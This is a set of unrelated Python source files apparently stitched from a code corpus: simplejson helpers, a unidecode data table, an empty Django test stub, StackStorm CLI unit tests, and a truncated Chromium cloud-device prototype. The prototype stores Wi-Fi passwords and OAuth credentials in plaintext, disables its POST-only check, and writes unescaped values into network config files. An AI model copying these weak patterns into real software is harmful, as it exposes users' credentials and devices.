return cls(encoding=encoding, **kw).decode(s)
def _toggle_speedups(enabled):
import simplejson.decoder as dec
import simplejson.encoder as enc
import simplejson.scanner as scan
c_make_encoder = _import_c_make_encoder()
if enabled:
dec.scanstring = dec.c_scanstring or dec.py_scanstring
enc.c_make_encoder = c_make_encoder
enc.encode_basestring_ascii = (enc.c_encode_basestring_ascii or
enc.py_encode_basestring_ascii)
scan.make_scanner = scan.c_make_scanner or scan.py_make_scanner
else:
dec.scanstring = dec.py_scanstring
enc.c_make_encoder = None
enc.encode_basestring_ascii = enc.py_encode_basestring_ascii
scan.make_scanner = scan.py_make_scanner
dec.make_scanner = scan.make_scanner
global _default_decoder
_default_decoder = JSONDecoder(
encoding=None,
object_hook=None,
object_pairs_hook=None,
)
global _default_encoder
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
)
def simple_first(kv):
"""Helper function to pass to item_sort_key to sort simple
elements to the top, then container elements.
"""
return (isinstance(kv[1], (list, dict, tuple)), kv[0])
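# For illustration: dumps({'b': [1], 'a': 1}, item_sort_key=simple_first)
# yields '{"a": 1, "b": [1]}', because scalar members sort ahead of
# containers and ties fall back to the key.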
|
Venturi/oldcms | refs/heads/master | env/lib/python2.7/site-packages/unidecode/x064.py | 252 | data = (
'Chan ', # 0x00
'Ge ', # 0x01
'Lou ', # 0x02
'Zong ', # 0x03
'Geng ', # 0x04
'Jiao ', # 0x05
'Gou ', # 0x06
'Qin ', # 0x07
'Yong ', # 0x08
'Que ', # 0x09
'Chou ', # 0x0a
'Chi ', # 0x0b
'Zhan ', # 0x0c
'Sun ', # 0x0d
'Sun ', # 0x0e
'Bo ', # 0x0f
'Chu ', # 0x10
'Rong ', # 0x11
'Beng ', # 0x12
'Cuo ', # 0x13
'Sao ', # 0x14
'Ke ', # 0x15
'Yao ', # 0x16
'Dao ', # 0x17
'Zhi ', # 0x18
'Nu ', # 0x19
'Xie ', # 0x1a
'Jian ', # 0x1b
'Sou ', # 0x1c
'Qiu ', # 0x1d
'Gao ', # 0x1e
'Xian ', # 0x1f
'Shuo ', # 0x20
'Sang ', # 0x21
'Jin ', # 0x22
'Mie ', # 0x23
'E ', # 0x24
'Chui ', # 0x25
'Nuo ', # 0x26
'Shan ', # 0x27
'Ta ', # 0x28
'Jie ', # 0x29
'Tang ', # 0x2a
'Pan ', # 0x2b
'Ban ', # 0x2c
'Da ', # 0x2d
'Li ', # 0x2e
'Tao ', # 0x2f
'Hu ', # 0x30
'Zhi ', # 0x31
'Wa ', # 0x32
'Xia ', # 0x33
'Qian ', # 0x34
'Wen ', # 0x35
'Qiang ', # 0x36
'Tian ', # 0x37
'Zhen ', # 0x38
'E ', # 0x39
'Xi ', # 0x3a
'Nuo ', # 0x3b
'Quan ', # 0x3c
'Cha ', # 0x3d
'Zha ', # 0x3e
'Ge ', # 0x3f
'Wu ', # 0x40
'En ', # 0x41
'She ', # 0x42
'Kang ', # 0x43
'She ', # 0x44
'Shu ', # 0x45
'Bai ', # 0x46
'Yao ', # 0x47
'Bin ', # 0x48
'Sou ', # 0x49
'Tan ', # 0x4a
'Sa ', # 0x4b
'Chan ', # 0x4c
'Suo ', # 0x4d
'Liao ', # 0x4e
'Chong ', # 0x4f
'Chuang ', # 0x50
'Guo ', # 0x51
'Bing ', # 0x52
'Feng ', # 0x53
'Shuai ', # 0x54
'Di ', # 0x55
'Qi ', # 0x56
'Sou ', # 0x57
'Zhai ', # 0x58
'Lian ', # 0x59
'Tang ', # 0x5a
'Chi ', # 0x5b
'Guan ', # 0x5c
'Lu ', # 0x5d
'Luo ', # 0x5e
'Lou ', # 0x5f
'Zong ', # 0x60
'Gai ', # 0x61
'Hu ', # 0x62
'Zha ', # 0x63
'Chuang ', # 0x64
'Tang ', # 0x65
'Hua ', # 0x66
'Cui ', # 0x67
'Nai ', # 0x68
'Mo ', # 0x69
'Jiang ', # 0x6a
'Gui ', # 0x6b
'Ying ', # 0x6c
'Zhi ', # 0x6d
'Ao ', # 0x6e
'Zhi ', # 0x6f
'Nie ', # 0x70
'Man ', # 0x71
'Shan ', # 0x72
'Kou ', # 0x73
'Shu ', # 0x74
'Suo ', # 0x75
'Tuan ', # 0x76
'Jiao ', # 0x77
'Mo ', # 0x78
'Mo ', # 0x79
'Zhe ', # 0x7a
'Xian ', # 0x7b
'Keng ', # 0x7c
'Piao ', # 0x7d
'Jiang ', # 0x7e
'Yin ', # 0x7f
'Gou ', # 0x80
'Qian ', # 0x81
'Lue ', # 0x82
'Ji ', # 0x83
'Ying ', # 0x84
'Jue ', # 0x85
'Pie ', # 0x86
'Pie ', # 0x87
'Lao ', # 0x88
'Dun ', # 0x89
'Xian ', # 0x8a
'Ruan ', # 0x8b
'Kui ', # 0x8c
'Zan ', # 0x8d
'Yi ', # 0x8e
'Xun ', # 0x8f
'Cheng ', # 0x90
'Cheng ', # 0x91
'Sa ', # 0x92
'Nao ', # 0x93
'Heng ', # 0x94
'Si ', # 0x95
'Qian ', # 0x96
'Huang ', # 0x97
'Da ', # 0x98
'Zun ', # 0x99
'Nian ', # 0x9a
'Lin ', # 0x9b
'Zheng ', # 0x9c
'Hui ', # 0x9d
'Zhuang ', # 0x9e
'Jiao ', # 0x9f
'Ji ', # 0xa0
'Cao ', # 0xa1
'Dan ', # 0xa2
'Dan ', # 0xa3
'Che ', # 0xa4
'Bo ', # 0xa5
'Che ', # 0xa6
'Jue ', # 0xa7
'Xiao ', # 0xa8
'Liao ', # 0xa9
'Ben ', # 0xaa
'Fu ', # 0xab
'Qiao ', # 0xac
'Bo ', # 0xad
'Cuo ', # 0xae
'Zhuo ', # 0xaf
'Zhuan ', # 0xb0
'Tuo ', # 0xb1
'Pu ', # 0xb2
'Qin ', # 0xb3
'Dun ', # 0xb4
'Nian ', # 0xb5
'[?] ', # 0xb6
'Xie ', # 0xb7
'Lu ', # 0xb8
'Jiao ', # 0xb9
'Cuan ', # 0xba
'Ta ', # 0xbb
'Han ', # 0xbc
'Qiao ', # 0xbd
'Zhua ', # 0xbe
'Jian ', # 0xbf
'Gan ', # 0xc0
'Yong ', # 0xc1
'Lei ', # 0xc2
'Kuo ', # 0xc3
'Lu ', # 0xc4
'Shan ', # 0xc5
'Zhuo ', # 0xc6
'Ze ', # 0xc7
'Pu ', # 0xc8
'Chuo ', # 0xc9
'Ji ', # 0xca
'Dang ', # 0xcb
'Suo ', # 0xcc
'Cao ', # 0xcd
'Qing ', # 0xce
'Jing ', # 0xcf
'Huan ', # 0xd0
'Jie ', # 0xd1
'Qin ', # 0xd2
'Kuai ', # 0xd3
'Dan ', # 0xd4
'Xi ', # 0xd5
'Ge ', # 0xd6
'Pi ', # 0xd7
'Bo ', # 0xd8
'Ao ', # 0xd9
'Ju ', # 0xda
'Ye ', # 0xdb
'[?] ', # 0xdc
'Mang ', # 0xdd
'Sou ', # 0xde
'Mi ', # 0xdf
'Ji ', # 0xe0
'Tai ', # 0xe1
'Zhuo ', # 0xe2
'Dao ', # 0xe3
'Xing ', # 0xe4
'Lan ', # 0xe5
'Ca ', # 0xe6
'Ju ', # 0xe7
'Ye ', # 0xe8
'Ru ', # 0xe9
'Ye ', # 0xea
'Ye ', # 0xeb
'Ni ', # 0xec
'Hu ', # 0xed
'Ji ', # 0xee
'Bin ', # 0xef
'Ning ', # 0xf0
'Ge ', # 0xf1
'Zhi ', # 0xf2
'Jie ', # 0xf3
'Kuo ', # 0xf4
'Mo ', # 0xf5
'Jian ', # 0xf6
'Xie ', # 0xf7
'Lie ', # 0xf8
'Tan ', # 0xf9
'Bai ', # 0xfa
'Sou ', # 0xfb
'Lu ', # 0xfc
'Lue ', # 0xfd
'Rao ', # 0xfe
'Zhi ', # 0xff
)
|
MineID/MineID | refs/heads/master | mineid/api/tests.py | 24123 | from django.test import TestCase
# Create your tests here.
|
Itxaka/st2 | refs/heads/master | st2client/tests/unit/test_commands.py | 7 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
import json
import logging
import argparse
import tempfile
import unittest2
from tests import base
from st2client import models
from st2client.utils import httpclient
from st2client.commands import resource
LOG = logging.getLogger(__name__)
class TestResourceCommand(unittest2.TestCase):
def __init__(self, *args, **kwargs):
super(TestResourceCommand, self).__init__(*args, **kwargs)
self.parser = argparse.ArgumentParser()
self.subparsers = self.parser.add_subparsers()
self.branch = resource.ResourceBranch(
base.FakeResource, 'Test Command', base.FakeApp(), self.subparsers)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps(base.RESOURCES), 200, 'OK')))
def test_command_list(self):
args = self.parser.parse_args(['fakeresource', 'list'])
self.assertEqual(args.func, self.branch.commands['list'].run_and_print)
instances = self.branch.commands['list'].run(args)
actual = [instance.serialize() for instance in instances]
expected = json.loads(json.dumps(base.RESOURCES))
self.assertListEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse('', 500, 'INTERNAL SERVER ERROR')))
def test_command_list_failed(self):
args = self.parser.parse_args(['fakeresource', 'list'])
self.assertRaises(Exception, self.branch.commands['list'].run, args)
@mock.patch.object(
models.ResourceManager, 'get_by_name',
mock.MagicMock(return_value=None))
@mock.patch.object(
models.ResourceManager, 'get_by_id',
mock.MagicMock(return_value=base.FakeResource(**base.RESOURCES[0])))
def test_command_get_by_id(self):
args = self.parser.parse_args(['fakeresource', 'get', '123'])
self.assertEqual(args.func, self.branch.commands['get'].run_and_print)
instance = self.branch.commands['get'].run(args)
actual = instance.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
@mock.patch.object(
models.ResourceManager, 'get_by_name',
mock.MagicMock(return_value=base.FakeResource(**base.RESOURCES[0])))
@mock.patch.object(
models.ResourceManager, 'get_by_id',
mock.MagicMock(return_value=None))
def test_command_get_by_name(self):
args = self.parser.parse_args(['fakeresource', 'get', 'abc'])
self.assertEqual(args.func, self.branch.commands['get'].run_and_print)
instance = self.branch.commands['get'].run(args)
actual = instance.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
def test_command_get(self):
args = self.parser.parse_args(['fakeresource', 'get', 'abc'])
self.assertEqual(args.func, self.branch.commands['get'].run_and_print)
instance = self.branch.commands['get'].run(args)
actual = instance.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse('', 404, 'NOT FOUND')))
def test_command_get_404(self):
args = self.parser.parse_args(['fakeresource', 'get', 'cba'])
self.assertEqual(args.func, self.branch.commands['get'].run_and_print)
self.assertRaises(resource.ResourceNotFoundError,
self.branch.commands['get'].run,
args)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse('', 500, 'INTERNAL SERVER ERROR')))
def test_command_get_failed(self):
args = self.parser.parse_args(['fakeresource', 'get', 'cba'])
self.assertRaises(Exception, self.branch.commands['get'].run, args)
@mock.patch.object(
httpclient.HTTPClient, 'post',
mock.MagicMock(return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, 'OK')))
def test_command_create(self):
instance = base.FakeResource(name='abc')
fd, path = tempfile.mkstemp(suffix='.json')
try:
with open(path, 'a') as f:
f.write(json.dumps(instance.serialize(), indent=4))
args = self.parser.parse_args(['fakeresource', 'create', path])
self.assertEqual(args.func,
self.branch.commands['create'].run_and_print)
instance = self.branch.commands['create'].run(args)
actual = instance.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
finally:
os.close(fd)
os.unlink(path)
@mock.patch.object(
httpclient.HTTPClient, 'post',
mock.MagicMock(return_value=base.FakeResponse('', 500, 'INTERNAL SERVER ERROR')))
def test_command_create_failed(self):
instance = base.FakeResource(name='abc')
fd, path = tempfile.mkstemp(suffix='.json')
try:
with open(path, 'a') as f:
f.write(json.dumps(instance.serialize(), indent=4))
args = self.parser.parse_args(['fakeresource', 'create', path])
self.assertRaises(Exception,
self.branch.commands['create'].run,
args)
finally:
os.close(fd)
os.unlink(path)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
@mock.patch.object(
httpclient.HTTPClient, 'put',
mock.MagicMock(return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, 'OK')))
def test_command_update(self):
instance = base.FakeResource(id='123', name='abc')
fd, path = tempfile.mkstemp(suffix='.json')
try:
with open(path, 'a') as f:
f.write(json.dumps(instance.serialize(), indent=4))
args = self.parser.parse_args(
['fakeresource', 'update', '123', path])
self.assertEqual(args.func,
self.branch.commands['update'].run_and_print)
instance = self.branch.commands['update'].run(args)
actual = instance.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
finally:
os.close(fd)
os.unlink(path)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
@mock.patch.object(
httpclient.HTTPClient, 'put',
mock.MagicMock(return_value=base.FakeResponse('', 500, 'INTERNAL SERVER ERROR')))
def test_command_update_failed(self):
instance = base.FakeResource(id='123', name='abc')
fd, path = tempfile.mkstemp(suffix='.json')
try:
with open(path, 'a') as f:
f.write(json.dumps(instance.serialize(), indent=4))
args = self.parser.parse_args(
['fakeresource', 'update', '123', path])
self.assertRaises(Exception,
self.branch.commands['update'].run,
args)
finally:
os.close(fd)
os.unlink(path)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
def test_command_update_id_mismatch(self):
instance = base.FakeResource(id='789', name='abc')
fd, path = tempfile.mkstemp(suffix='.json')
try:
with open(path, 'a') as f:
f.write(json.dumps(instance.serialize(), indent=4))
args = self.parser.parse_args(
['fakeresource', 'update', '123', path])
self.assertRaises(Exception,
self.branch.commands['update'].run,
args)
finally:
os.close(fd)
os.unlink(path)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
@mock.patch.object(
httpclient.HTTPClient, 'delete',
mock.MagicMock(return_value=base.FakeResponse('', 204, 'NO CONTENT')))
def test_command_delete(self):
args = self.parser.parse_args(['fakeresource', 'delete', 'abc'])
self.assertEqual(args.func,
self.branch.commands['delete'].run_and_print)
self.branch.commands['delete'].run(args)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse('', 404, 'NOT FOUND')))
def test_command_delete_404(self):
args = self.parser.parse_args(['fakeresource', 'delete', 'cba'])
self.assertEqual(args.func,
self.branch.commands['delete'].run_and_print)
self.assertRaises(resource.ResourceNotFoundError,
self.branch.commands['delete'].run,
args)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
@mock.patch.object(
httpclient.HTTPClient, 'delete',
mock.MagicMock(return_value=base.FakeResponse('', 500, 'INTERNAL SERVER ERROR')))
def test_command_delete_failed(self):
args = self.parser.parse_args(['fakeresource', 'delete', 'cba'])
self.assertRaises(Exception, self.branch.commands['delete'].run, args)
|
SaschaMester/delicium | refs/heads/master | components/cloud_devices/tools/prototype/prototype.py | 65 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prototype of cloud device with support of local API.
This prototype has tons of flaws, not the least of which being that it
occasionally will block while waiting for commands to finish. However, this is
a quick sketch.
Script requires the following components:
sudo apt-get install python-tornado
sudo apt-get install python-pip
sudo pip install google-api-python-client
sudo pip install ecdsa
"""
import atexit
import base64
import datetime
import json
import os
import random
import subprocess
import time
import traceback
from apiclient.discovery import build_from_document
from apiclient.errors import HttpError
import httplib2
from oauth2client.client import AccessTokenRefreshError
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.file import Storage
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
_OAUTH_SCOPE = 'https://www.googleapis.com/auth/clouddevices'
_CONFIG_FILE = 'config.json'
_API_DISCOVERY_FILE = 'discovery.json'
_DEVICE_STATE_FILE = 'device_state.json'
_DEVICE_SETUP_SSID = 'GCD Prototype %02d..Bcamprv'
_DEVICE_NAME = 'GCD Prototype'
_DEVICE_TYPE = 'vendor'
_DEVICE_PORT = 8080
DEVICE_DRAFT = {
'systemName': 'LEDFlasher',
'deviceKind': 'vendor',
'displayName': _DEVICE_NAME,
'channel': {
'supportedType': 'xmpp'
},
'commandDefs': {
'base': {
# TODO(vitalybuka): find new format for custom commands.
# 'vendorCommands': [{
# 'name': 'flashLED',
# 'parameter': [{
# 'name': 'times',
# 'type': 'string'
# }]
# }]
}
}
}
wpa_supplicant_cmd = 'wpa_supplicant -Dwext -i%s -cwpa_supplicant.conf'
ifconfig_cmd = 'ifconfig %s 192.168.0.3'
hostapd_cmd = 'hostapd hostapd-min.conf'
dhclient_release = 'dhclient -r %s'
dhclient_renew = 'dhclient %s'
dhcpd_cmd = 'udhcpd -f udhcpd.conf'
wpa_supplicant_conf = 'wpa_supplicant.conf'
wpa_supplicant_template = """
network={
ssid="%s"
scan_ssid=1
proto=WPA RSN
key_mgmt=WPA-PSK
pairwise=CCMP TKIP
group=CCMP TKIP
psk="%s"
}"""
hostapd_conf = 'hostapd-min.conf'
hostapd_template = """
interface=%s
driver=nl80211
ssid=%s
channel=1
"""
udhcpd_conf = 'udhcpd.conf'
udhcpd_template = """
start 192.168.0.20
end 192.168.0.254
interface %s
"""
class DeviceUnregisteredError(Exception):
pass
def ignore_errors(func):
def inner(*args, **kwargs):
try:
func(*args, **kwargs)
except Exception: # pylint: disable=broad-except
print 'Got error in unsafe function:'
traceback.print_exc()
return inner
class CommandWrapperReal(object):
"""Command wrapper that executs shell commands."""
def __init__(self, cmd):
if type(cmd) in [str, unicode]:
cmd = cmd.split()
self.cmd = cmd
self.cmd_str = ' '.join(cmd)
self.process = None
def start(self):
print 'Start: ', self.cmd_str
if self.process:
self.end()
self.process = subprocess.Popen(self.cmd)
def wait(self):
print 'Wait: ', self.cmd_str
self.process.wait()
def end(self):
print 'End: ', self.cmd_str
if self.process:
self.process.terminate()
class CommandWrapperFake(object):
"""Command wrapper that just prints shell commands."""
def __init__(self, cmd):
self.cmd_str = ' '.join(cmd)
def start(self):
print 'Fake start: ', self.cmd_str
def wait(self):
print 'Fake wait: ', self.cmd_str
def end(self):
print 'Fake end: ', self.cmd_str
class CloudCommandHandlerFake(object):
"""Prints devices commands without execution."""
def __init__(self, ioloop):
pass
def handle_command(self, command_name, args):
if command_name == 'flashLED':
times = 1
if 'times' in args:
times = int(args['times'])
print 'Flashing LED %d times' % times
class CloudCommandHandlerReal(object):
"""Executes device commands."""
def __init__(self, ioloop, led_path):
self.ioloop = ioloop
self.led_path = led_path
def handle_command(self, command_name, args):
if command_name == 'flashLED':
times = 1
if 'times' in args:
times = int(args['times'])
print 'Really flashing LED %d times' % times
self.flash_led(times)
@ignore_errors
def flash_led(self, times):
self.set_led(times*2, True)
def set_led(self, times, value):
"""Set led value."""
if not times:
return
file_trigger = open(os.path.join(self.led_path, 'brightness'), 'w')
if value:
file_trigger.write('1')
else:
file_trigger.write('0')
file_trigger.close()
self.ioloop.add_timeout(datetime.timedelta(milliseconds=500),
lambda: self.set_led(times - 1, not value))
class WifiHandler(object):
"""Base class for wifi handlers."""
class Delegate(object):
def on_wifi_connected(self, unused_token):
"""Token is optional, and all delegates should support it being None."""
raise Exception('Unhandled condition: WiFi connected')
def __init__(self, ioloop, state, config, setup_ssid, delegate):
self.ioloop = ioloop
self.state = state
self.delegate = delegate
self.setup_ssid = setup_ssid
self.interface = config['wireless_interface']
def start(self):
raise Exception('Start not implemented!')
def get_ssid(self):
raise Exception('Get SSID not implemented!')
class WifiHandlerReal(WifiHandler):
"""Real wifi handler.
Note that by using CommandWrapperFake, you can run WifiHandlerReal on fake
devices for testing the wifi-specific logic.
"""
def __init__(self, ioloop, state, config, setup_ssid, delegate):
super(WifiHandlerReal, self).__init__(ioloop, state, config,
setup_ssid, delegate)
if config['simulate_commands']:
self.command_wrapper = CommandWrapperFake
else:
self.command_wrapper = CommandWrapperReal
self.hostapd = self.command_wrapper(hostapd_cmd)
self.wpa_supplicant = self.command_wrapper(
wpa_supplicant_cmd % self.interface)
self.dhcpd = self.command_wrapper(dhcpd_cmd)
def start(self):
if self.state.has_wifi():
self.switch_to_wifi(self.state.ssid(), self.state.password(), None)
else:
self.start_hostapd()
def start_hostapd(self):
hostapd_config = open(hostapd_conf, 'w')
hostapd_config.write(hostapd_template % (self.interface, self.setup_ssid))
hostapd_config.close()
self.hostapd.start()
time.sleep(3)
self.run_command(ifconfig_cmd % self.interface)
self.dhcpd.start()
def switch_to_wifi(self, ssid, passwd, token):
try:
udhcpd_config = open(udhcpd_conf, 'w')
udhcpd_config.write(udhcpd_template % self.interface)
udhcpd_config.close()
wpa_config = open(wpa_supplicant_conf, 'w')
wpa_config.write(wpa_supplicant_template % (ssid, passwd))
wpa_config.close()
self.hostapd.end()
self.dhcpd.end()
self.wpa_supplicant.start()
self.run_command(dhclient_release % self.interface)
self.run_command(dhclient_renew % self.interface)
self.state.set_wifi(ssid, passwd)
self.delegate.on_wifi_connected(token)
except DeviceUnregisteredError:
self.state.reset()
self.wpa_supplicant.end()
self.start_hostapd()
def stop(self):
self.hostapd.end()
self.wpa_supplicant.end()
self.dhcpd.end()
def get_ssid(self):
return self.state.get_ssid()
def run_command(self, cmd):
wrapper = self.command_wrapper(cmd)
wrapper.start()
wrapper.wait()
class WifiHandlerPassthrough(WifiHandler):
"""Passthrough wifi handler."""
def __init__(self, ioloop, state, config, setup_ssid, delegate):
super(WifiHandlerPassthrough, self).__init__(ioloop, state, config,
setup_ssid, delegate)
def start(self):
self.delegate.on_wifi_connected(None)
def switch_to_wifi(self, unused_ssid, unused_passwd, unused_token):
raise Exception('Should not be reached')
def stop(self):
pass
def get_ssid(self):
return 'dummy'
class State(object):
"""Device state."""
def __init__(self):
self.oauth_storage_ = Storage('oauth_creds')
self.clear()
def clear(self):
self.credentials_ = None
self.has_credentials_ = False
self.has_wifi_ = False
self.ssid_ = ''
self.password_ = ''
self.device_id_ = ''
def reset(self):
self.clear()
self.dump()
def dump(self):
"""Saves device state to file."""
json_obj = {
'has_credentials': self.has_credentials_,
'has_wifi': self.has_wifi_,
'ssid': self.ssid_,
'password': self.password_,
'device_id': self.device_id_
}
statefile = open(_DEVICE_STATE_FILE, 'w')
json.dump(json_obj, statefile)
statefile.close()
if self.has_credentials_:
self.oauth_storage_.put(self.credentials_)
def load(self):
if os.path.exists(_DEVICE_STATE_FILE):
statefile = open(_DEVICE_STATE_FILE, 'r')
json_obj = json.load(statefile)
statefile.close()
self.has_credentials_ = json_obj['has_credentials']
self.has_wifi_ = json_obj['has_wifi']
self.ssid_ = json_obj['ssid']
self.password_ = json_obj['password']
self.device_id_ = json_obj['device_id']
if self.has_credentials_:
self.credentials_ = self.oauth_storage_.get()
def set_credentials(self, credentials, device_id):
self.device_id_ = device_id
self.credentials_ = credentials
self.has_credentials_ = True
self.dump()
def set_wifi(self, ssid, password):
self.ssid_ = ssid
self.password_ = password
self.has_wifi_ = True
self.dump()
def has_wifi(self):
return self.has_wifi_
def has_credentials(self):
return self.has_credentials_
def credentials(self):
return self.credentials_
def ssid(self):
return self.ssid_
def password(self):
return self.password_
def device_id(self):
return self.device_id_
class Config(object):
"""Configuration parameters (should not change)"""
def __init__(self):
if not os.path.isfile(_CONFIG_FILE):
config = {
'oauth_client_id': '',
'oauth_secret': '',
'api_key': '',
'wireless_interface': ''
}
config_f = open(_CONFIG_FILE + '.sample', 'w')
      config_f.write(json.dumps(config, sort_keys=True,
indent=2, separators=(',', ': ')))
config_f.close()
raise Exception('Missing ' + _CONFIG_FILE)
config_f = open(_CONFIG_FILE)
config = json.load(config_f)
config_f.close()
self.config = config
def __getitem__(self, item):
if item in self.config:
return self.config[item]
return None
class MDnsWrapper(object):
"""Handles mDNS requests to device."""
def __init__(self, command_wrapper):
self.command_wrapper = command_wrapper
self.avahi_wrapper = None
self.setup_name = None
self.device_id = ''
self.started = False
def start(self):
self.started = True
self.run_command()
def get_command(self):
"""Return the command to run mDNS daemon."""
cmd = [
'avahi-publish',
'-s', '--subtype=_%s._sub._privet._tcp' % _DEVICE_TYPE,
_DEVICE_NAME, '_privet._tcp', '%s' % _DEVICE_PORT,
'txtvers=3',
'type=%s' % _DEVICE_TYPE,
'ty=%s' % _DEVICE_NAME,
'id=%s' % self.device_id
]
if self.setup_name:
cmd.append('setup_ssid=' + self.setup_name)
return cmd
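  # For illustration: with device_id '123' and no setup_ssid pending, the list
  # above resolves to roughly
  #   avahi-publish -s --subtype=_vendor._sub._privet._tcp 'GCD Prototype'
  #       _privet._tcp 8080 txtvers=3 type=vendor ty='GCD Prototype' id=123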
def run_command(self):
if self.avahi_wrapper:
self.avahi_wrapper.end()
self.avahi_wrapper.wait()
self.avahi_wrapper = self.command_wrapper(self.get_command())
self.avahi_wrapper.start()
def set_id(self, device_id):
self.device_id = device_id
if self.started:
self.run_command()
def set_setup_name(self, setup_name):
self.setup_name = setup_name
if self.started:
self.run_command()
class CloudDevice(object):
"""Handles device registration and commands."""
class Delegate(object):
def on_device_started(self):
raise Exception('Not implemented: Device started')
def on_device_stopped(self):
raise Exception('Not implemented: Device stopped')
def __init__(self, ioloop, state, config, command_wrapper, delegate):
self.state = state
self.http = httplib2.Http()
self.oauth_client_id = config['oauth_client_id']
self.oauth_secret = config['oauth_secret']
self.api_key = config['api_key']
if not os.path.isfile(_API_DISCOVERY_FILE):
raise Exception('Download https://developers.google.com/'
'cloud-devices/v1/discovery.json')
f = open(_API_DISCOVERY_FILE)
discovery = f.read()
f.close()
self.gcd = build_from_document(discovery, developerKey=self.api_key,
http=self.http)
self.ioloop = ioloop
self.active = True
self.device_id = None
self.credentials = None
self.delegate = delegate
self.command_handler = command_wrapper
def try_start(self, token):
"""Tries start or register device."""
if self.state.has_credentials():
self.credentials = self.state.credentials()
self.device_id = self.state.device_id()
self.run_device()
elif token:
self.register(token)
else:
print 'Device not registered and has no credentials.'
print 'Waiting for registration.'
def register(self, token):
"""Register device."""
resource = {
'deviceDraft': DEVICE_DRAFT,
'oauthClientId': self.oauth_client_id
}
self.gcd.registrationTickets().patch(registrationTicketId=token,
body=resource).execute()
final_ticket = self.gcd.registrationTickets().finalize(
registrationTicketId=token).execute()
authorization_code = final_ticket['robotAccountAuthorizationCode']
flow = OAuth2WebServerFlow(self.oauth_client_id, self.oauth_secret,
_OAUTH_SCOPE, redirect_uri='oob')
self.credentials = flow.step2_exchange(authorization_code)
self.device_id = final_ticket['deviceDraft']['id']
self.state.set_credentials(self.credentials, self.device_id)
print 'Registered with device_id ', self.device_id
self.run_device()
def run_device(self):
"""Runs device."""
self.credentials.authorize(self.http)
try:
self.gcd.devices().get(deviceId=self.device_id).execute()
except HttpError, e:
# Pretty good indication the device was deleted
if e.resp.status == 404:
raise DeviceUnregisteredError()
except AccessTokenRefreshError:
raise DeviceUnregisteredError()
self.check_commands()
self.delegate.on_device_started()
def check_commands(self):
"""Checks device commands."""
if not self.active:
return
print 'Checking commands...'
commands = self.gcd.commands().list(deviceId=self.device_id,
state='queued').execute()
if 'commands' in commands:
print 'Found ', len(commands['commands']), ' commands'
vendor_command_name = None
for command in commands['commands']:
try:
if command['name'].startswith('base._'):
vendor_command_name = command['name'][len('base._'):]
if 'parameters' in command:
parameters = command['parameters']
else:
parameters = {}
else:
vendor_command_name = None
except KeyError:
print 'Could not parse vendor command ',
print repr(command)
vendor_command_name = None
if vendor_command_name:
self.command_handler.handle_command(vendor_command_name, parameters)
self.gcd.commands().patch(commandId=command['id'],
body={'state': 'done'}).execute()
else:
print 'Found no commands'
self.ioloop.add_timeout(datetime.timedelta(milliseconds=1000),
self.check_commands)
def stop(self):
self.active = False
def get_device_id(self):
return self.device_id
def get_only(f):
def inner(self, request, response_func, *args):
if request.method != 'GET':
return False
return f(self, request, response_func, *args)
return inner
def post_only(f):
def inner(self, request, response_func, *args):
# if request.method != 'POST':
# return False
return f(self, request, response_func, *args)
return inner
def wifi_provisioning(f):
def inner(self, request, response_func, *args):
if self.on_wifi:
return False
return f(self, request, response_func, *args)
return inner
def post_provisioning(f):
def inner(self, request, response_func, *args):
if not self.on_wifi:
return False
return f(self, request, response_func, *args)
return inner
class WebRequestHandler(WifiHandler.Delegate, CloudDevice.Delegate):
"""Handles HTTP requests."""
class InvalidStepError(Exception):
pass
class InvalidPackageError(Exception):
pass
class EncryptionError(Exception):
pass
class CancelableClosure(object):
"""Allows to cancel callbacks."""
def __init__(self, function):
self.function = function
def __call__(self):
if self.function:
